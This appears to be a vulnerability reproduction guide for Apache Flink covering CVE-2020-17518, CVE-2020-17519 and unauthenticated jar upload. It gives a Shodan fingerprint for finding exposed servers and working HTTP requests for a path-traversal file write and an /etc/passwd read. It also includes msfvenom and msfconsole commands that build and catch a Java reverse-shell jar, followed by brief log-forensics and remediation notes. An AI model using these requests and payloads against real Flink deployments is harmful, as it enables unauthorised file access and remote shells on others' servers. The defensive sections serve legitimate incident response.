Apache Flink Vulnerability Overview
Apache Flink is an open-source stream processing framework with powerful stream and batch processing capabilities.
CVE-2020-17518 Apache Flink 1.5.1 introduced a REST handler that allows uploaded files to be written to arbitrary locations on the local file system through maliciously modified HTTP HEADERs.
CVE-2020-17519 A change introduced in Apache Flink 1.11.0 (also released in 1.11.1 and 1.11.2) allows attackers to read any file on the JobManagerâs local file system via the REST interface of the JobManager process.
Unauthorized Access to Upload Jar Package for Getshell This does not have a CVE. The functionality of uploading a Jar package for execution is inherent, but Flinkâs backend page lacks authentication, leading to unauthorized access and uploading of a jar package for getshell.
Affected Versions of Apache Flink
CVE-2020-17518 1.5.1 < Flink < 1.11.2
CVE-2020-17519 Flink 1.11.0, 1.11.1, 1.11.2
Shodan Search Syntax: Apache Flink
http.favicon.hash:180732787
Apache Flink Vulnerability Exploit
The exploit for this vulnerability is relatively simple, and the exp tests on GitHub are not very effective. Manual testing is recommended for reproduction.
https://github.com/QmF0c3UK/CVE-2020-17518
https://github.com/B1anda0/CVE-2020-17519
Setting Up an Apache Flink Vulnerability Environment
Use vulhub for reproduction. After setup, directly access the backend management interface without authentication. Both vulnerabilities use the same environment.
If not using Docker, you can download the tgz from the official website for extraction and installation.
https://flink.apache.org/downloads
wget https://archive.apache.org/dist/flink/flink-1.14.6/flink-1.14.6-bin-scala_2.11.tgz tar xvf flink-1.14.6-bin-scala_2.11.tgz cd flink-1.14.6/bin/ ./start-cluster.sh
Vulnerability Reproduction
CVE-2020-17518
Click to upload the jar package above, use Burp to capture the packet and modify the path.
POST /jars/upload HTTP/1.1 Host: vul.zgao.top:8081 Content-Length: 228 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryphBB4uHGBVImrUXt Connection: close ------WebKitFormBoundaryphBB4uHGBVImrUXt Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success" Content-Type: application/octet-stream success ------WebKitFormBoundaryphBB4uHGBVImrUXt--
File uploaded successfully.
CVE-2020-17519
GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1 Host: vul.zgao.top:8081 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Connection: close
Create a reverse shell jar package using msf.
msfvenom -p java/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f jar > rce.jar
msfconsole set payload java/shell/reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 show options run
Traceback Investigation
Log locations:
- /opt/flink/log
- flink/flink-1.14.6/log/
If downloaded and installed from the official site, Flink is located in the directory where it was extracted and installed.
Arbitrary File Write Vulnerability Investigation
Investigation keyword: JarUploadHandler
Directory Traversal Vulnerability Investigation
Directory traversal arbitrary file reading is not recorded in the logs.
Check the configuration file to view the directory location of the uploaded jar package.
Investigation keyword: JarRunHandler
The command execution records are located in the .out file, such as flink-root-standalonesession-0-VM-4-7-centos.out
Remediation
- Upgrade to the latest version
- Prohibit unauthorized access to the Flink backend page